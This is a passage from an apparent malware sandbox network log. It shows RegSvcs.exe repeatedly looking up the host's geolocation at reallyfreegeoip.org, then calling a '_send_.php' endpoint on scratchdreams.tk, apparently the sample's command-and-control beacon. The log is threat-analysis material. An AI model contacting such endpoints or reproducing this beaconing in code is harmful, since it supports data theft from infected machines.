2024-04-08 11:59:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	172.67.177.134	443	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:16 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 11:59:16 UTC	712	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79457 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skSjw8F%2FeEaajaXqSb8hFrEVPiP2sdJw%2FCY3lFfYSLmT8Iac%2Br3zhmyYvkU8USCn%2BVdvdWLutcs%2FtUW%2BO1pOwn3LXJ7FcH1KqyM0xwNEbCDbSLpB9gzodThwq7Y84ubYkpFo0JNt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 871217203c1e5c64-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:16 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	172.67.177.134	443	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:17 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 11:59:17 UTC	710	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:17 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79458 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BpNCIM%2FE3ovdeA4bSM%2FUpX1OsEN5sxMd9OjevbEpxBuluiskQyfczqf1EIJspxvVIVr6EAA942P5u9Cuupm8nEE%2Fxf8J5EVZ%2BYBen9%2FwU6bWvqNyUQC5gl01SqhfDcseb3c5AZ0n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 871217276a552594-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:17 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	172.67.177.134	443	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:18 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 11:59:18 UTC	710	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79459 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MQnJtPzYoc%2BK5SN5DErvcdDcoi0ncFPi0d%2BPoA1TYNWeNnjBQsrkzHLkkbPWaMgYzEPA996zBs7X1gBRKx1c5Y6%2Bj2ToBZ6GSo5bIJwXJN2p11ozaw4yUKJ%2BHeTf%2Ftw4iN8wy4MY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8712172d5e1767db-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:18 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	172.67.177.134	443	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:19 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 11:59:20 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79461 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EXRQ3QHwGC%2FVGJOGr0MXVQOkxOajDsljpqIHVVwjGSSICv8X%2FZxVvjbEENwm17hGQfbsUTa%2BXABLLRrG6aS7hfJFh1cWj4e1qkGz2KSpYoF7PGrA70wxsQIivRLrTVaLSMyVEA6G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 871217364e0b747e-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:20 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	172.67.177.134	443	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:22 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 11:59:22 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79463 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9jDborLoT85dDycP7LXe95ZbdEGhz5%2FpbiHnJbC4jpTZQvuDbSFQBjRHi8cyprATDX6GM%2BkjIvKseaviqxFMEJutlCWG0gwHjYI1%2FV4YNRZowTOh6emsvuMJjeIYQd87cROiRBf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87121745dad66d9e-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:22 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	172.67.177.134	443	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:23 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 11:59:23 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79464 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4H1pos%2FSrzy1JNihzQ0lpHQVZipYJQOyX2YXN7p4XyrQ%2F1vttsCKysMeZG5DOchoHYyBKXGsb%2BTEO1YWfD7Mzp86mlv95r9DvLGx4Iw4SwHCDUAFYs4g5784fhW8PqDleyBEFrY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8712174b9a91a4e5-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:23 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	172.67.177.134	443	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:24 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 11:59:24 UTC	712	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79465 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZF%2Fcl4IJtK8pqAvVAX%2BJDAahd5nb7fmIaacZ%2FUomO8wEwSbbEhgc6sm5PeMg0zg%2FBHGcfbvdY5p5Uw45wr%2Bq6ILOHMfPkMa6R3aLJqaEhVKfPovD%2BubZPTXQUCDNan7cDddpGxh1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87121751e9b5db0d-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:24 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	104.21.27.85	443	5444	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:25 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-04-08 11:59:56 UTC	743	IN	HTTP/1.1 522 Date: Mon, 08 Apr 2024 11:59:56 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PGCKZS9%2FdPD0ZQnMiNlGz%2BgtP9yIRwn2rp3wAacwLkou18fLJfG8rO%2F%2BZSA2DGMV08VfCpFcXC6QHn0ZbQgLKqEpziQX%2BD2kb0ZH1iwH6TD2mxmV%2B1Dl%2BcUjNk0kU9BeXzg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 871217580f5ea4f4-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:56 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	172.67.177.134	443	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:25 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 11:59:26 UTC	704	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79467 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lI5UO2ckQXImT94StjQlGIVjTOHrAmPpYm2n5mh8yX6h5qrz%2BYJozi4czpASb1QfvSKX3uPKJLzuqINQ3uwSeHKCCTIrHnOoy%2F5DZaHmPE0o8jp7H3f6tSvUlkAoynLtYF3SU2qK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8712175c68ab8da3-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:26 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49755	172.67.177.134	443	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:26 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 11:59:26 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79467 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OvaLhmr95Dd6JtuMCP6jMOWaym0Xdbm5S6lbw3vIfraLWk0CPVyslkwlludLzjOq5ppZWNqi2%2B120YfNMI%2FCVvvgBJA0da7ybGKG21AeUOa9uLlHHx0jZ2YRRBYj1lOZdKsVk%2FQd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 871217611e0a5c5f-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:26 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49757	172.67.177.134	443	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:27 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 11:59:27 UTC	714	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79468 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gOxosF%2BSKpIpwjspfkb7yVGXw1SFvJ4SwABufC1Q6ohnR%2FTeD%2F97EdaAUApY1JinrODV9Ra%2BQK2QCju%2BDMrKsHZawkKD7MW3mTJM7rUjg%2FeRsLZdn9QFdDR6JK4uI4%2B9zHXWiZ16"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87121766fe8adb09-MIA alt-svc: h3=":443"; ma=86400
